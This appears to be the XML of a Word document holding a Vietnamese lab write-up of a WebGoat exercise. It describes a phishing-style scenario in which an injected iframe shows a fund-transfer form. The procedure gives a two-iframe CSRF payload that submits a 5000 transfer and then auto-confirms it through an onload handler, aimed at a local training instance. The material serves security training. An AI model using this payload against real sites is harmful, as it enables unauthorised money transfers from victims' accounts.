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0DC68" w14:textId="6A9E8DF2" w:rsidR="005819F5" w:rsidRDefault="005819F5">
      <w:r w:rsidRPr="003D183B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Để nâng lv của việc lừa đảo lên, Hacker sẽ tạo giả 1 cái IFRAME trong phần Message liên kết đến Server của Hacker nhằm tăng mức độ tinh vi của cú lừa và độ tin cậy của người dùng khi thấy một Side được thiết kế y chang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB86D15" w14:textId="2632609E" w:rsidR="005819F5" w:rsidRDefault="005819F5">
      <w:r w:rsidRPr="003D183B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tạo một Form chuyển tiền hiển thị trực tiếp trong phần Email</w:t>
      </w:r>
      <w:r w:rsidR="005C2F7C">
        <w:t xml:space="preserve"> và Comfirm để xác nhận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9891FB" w14:textId="12E74AE5" w:rsidR="005819F5" w:rsidRPr="003D183B" w:rsidRDefault="005819F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D183B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiến hành:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E2437" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:t>&lt;iframe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED02202" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:tab/>
        <w:t>src="http://localhost:8080/WebGoat/attack?Screen=XXX&amp;menu=YYY&amp;transferFunds=5000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B559E7" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:tab/>
        <w:t>id="myFrame" frameborder="1" marginwidth="0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1546CF15" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:tab/>
        <w:t>marginheight="0" width="800" scrolling=yes height="300"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58831C23" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:tab/>
        <w:t>onload="document.getElementById('frame2').src='http://localhost:8080/WebGoat/attack?Screen=XXX&amp;menu=YYY&amp;transferFunds=CONFIRM';"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB5DCE" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:t>&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA81AD" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C"/>
    <w:p w14:paraId="723D9B84" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:t>&lt;iframe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408416B5" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:tab/>
        <w:t>id="frame2" frameborder="1" marginwidth="0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2667EC0E" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:tab/>
        <w:t>marginheight="0" width="800" scrolling=yes height="300"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD7A7CE" w14:textId="77777777" w:rsidR="005C2F7C" w:rsidRDefault="005C2F7C" w:rsidP="005C2F7C">
      <w:r>
        <w:t>&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30F341" w14:textId="77929AE6" w:rsidR="005819F5" w:rsidRDefault="004C211A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E4D5108" wp14:editId="744B648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58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2C"/>
    <w:rsid w:val="001B720A"/>
    <w:rsid w:val="003D183B"/>
    <w:rsid w:val="004C211A"/>
    <w:rsid w:val="005819F5"/>
    <w:rsid w:val="005C2F7C"/>
    <w:rsid w:val="00F3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DD69"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{531A7F60-DFE1-46EA-AC7F-5D33B9BD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2020-05-24T19:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-24T19:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>